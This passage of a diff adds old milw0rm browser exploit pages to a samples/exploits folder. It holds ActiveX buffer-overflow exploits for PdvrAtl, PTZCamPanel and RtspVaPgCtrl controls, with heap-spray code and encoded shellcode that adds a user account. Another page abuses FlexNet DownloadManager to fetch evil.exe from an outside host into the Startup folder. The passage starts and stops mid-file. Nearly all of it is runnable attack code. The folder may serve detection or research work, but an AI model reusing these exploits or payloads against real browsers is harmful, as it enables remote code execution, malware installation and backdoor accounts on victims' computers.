u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570");
+bigblock = unescape("%u9090%u9090");
+headersize = 20;
+slackspace = headersize+shellcode.length;
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<500;i++){memory[i] = block+shellcode}
+var suntzu = new ActiveXObject("PdvrAtl.PdvrOcx.1");//D64CF6D4-45DF-4D8F-9F14-E65FADF2777C
+wszFormat="";
+for (i=0;i<=1666;i++){wszFormat=wszFormat + unescape("%0d")}
+nTime=1;
+suntzu.TimeSpanFormat(nTime ,wszFormat);
+</script>
+</html>
+
+# milw0rm.com [2008-01-13]
35 samples/exploits/4909.html
@@ -0,0 +1,35 @@
+<!--
+Macrovision FlexNet DownloadManager Insecure Methods Exploit
+Implemented Categories:
+Category: Safe for Scripting
+Written by e.b.
+Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372
+-->
+<html>
+ <head>
+ <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title>
+ <script language="JavaScript" defer>
+ function Check() {
+
+ var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");
+
+ mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe");
+ mJob.SetPriority(0);
+ mJob.SetNotifyFlags(2);
+ mJob.ScheduleInterval = 2;
+
+ obj.RunScheduledJobs();
+
+
+ }
+
+ </script>
+ </head>
+ <body onload="JavaScript: return Check();">
+ <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0">
+ Unable to create object
+ </object>
+ </body>
+</html>
+
+# milw0rm.com [2008-01-14]
79 samples/exploits/4918.html
@@ -0,0 +1,79 @@
+<!--
+RTS Sentry Digital Surveillance PTZCamPanel Class (CamPanel.dll 2.1.0.2)
+remote buffer overflow exploit (ie7/xp sp2)
+
+
+check this camera demo:
+http://www.rtssentry.com/index.asp?PageAction=Custom&ID=10
+
+
+
+
+rgod
+-
+stay tuned with us ...
+http://retrogod.altervista.org/join.html
+security feeds, radio streams, techno/drum & bass stations to come
+-->
+<html>
+<object classid='clsid:A86934DA-C3D6-4C1C-BD83-CA4F14B362DE' id='PTZCamPanelCtrl' /></object>
+<script language="javascript">
+//add su one, user: sun pass: tzu
+shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
+ "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
+ "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
+ "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
+ "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
+ "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
+ "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
+ "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
+ "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
+ "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
+ "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
+ "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
+ "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
+ "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
+ "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
+ "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
+ "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
+ "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
+ "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
+ "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
+ "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
+ "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
+ "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
+ "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
+ "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
+ "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
+ "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
+ "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
+ "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
+ "%u7734%u4734%u4570");
+bigblock = unescape("%u9090%u9090");
+headersize = 20;
+slackspace = headersize+shellcode.length;
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<50;i++){memory[i] = block+shellcode}
+bigblock = unescape("%u0808%u0808");
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+for (i=50;i<100;i++){memory[i] = block+shellcode}
+bigblock = unescape("%u0c0c%u0c0c");
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+for (i=100;i<510;i++){memory[i] = block+shellcode}
+server="xxxxxxxx";
+user="";for (i=0;i<=9999;i++){user=user + unescape("%0d")}
+PTZCamPanelCtrl.ConnectServer(server,user);
+</script>
+</html>
+
+# milw0rm.com [2008-01-16]
82 samples/exploits/4932.html
@@ -0,0 +1,82 @@
+<!--
+Digital Data Communications RtspVaPgCtrl Class (RtspVapgDecoder.dll 1.1.0.29)
+remote buffer overflow (ie7/xp sp2)
+
+You may ask why I'm interested in theese untested/unpatched codecs,
+oh, well, I'm preparing a live scanner for clsid's, I mean not a fuzzer
+a framework which *choose* which control to exploit to see what happen,
+not blinding attack a common one. Even attackers have imagination,
+
+
+you know this?
+
+
+Someone should kill-bit theese codecs by os update and let you really
+choose which site can use them... this sound strange, or someone needs a
+backdoor always opened on IE? Oh, don't worry,
+
+joy and firewall bypass to the world.
+
+
+a site where you can find it: http://www.level1.com.au/demo.php
+my codebase: http://level1demo.dyndns.org:1030/RtspVaPgDec.cab
+
+rgod
+-
+stay tuned with us ...
+http://retrogod.altervista.org/join.html
+security feeds, radio streams, techno/drum & bass stations to come
+-->
+<html>
+<object classid='clsid:361E6B79-4A69-4376-B0F2-3D1EBEE9D7E2' id='RtspVaPgCtrl' /></object>
+<script language="javascript">
+///add su one, user: sun pass: tzu
+shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
+ "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
+ "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
+ "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
+ "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
+ "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
+ "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
+ "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
+ "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
+ "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
+ "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
+ "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
+ "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
+ "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
+ "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
+ "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
+ "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
+ "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
+ "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
+ "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
+ "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
+ "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
+ "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
+ "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
+ "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
+ "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
+ "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
+ "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
+ "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
+ "%u7734%u4734%u4570");
+bigblock = unescape("%00%09%09%00");//do not touch this
+headersize = 20;
+slackspace = headersize+shellcode.length;
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<400;i++){memory[i] = block+shellcode}
+puf="";
+for (i=0;i<55;i++)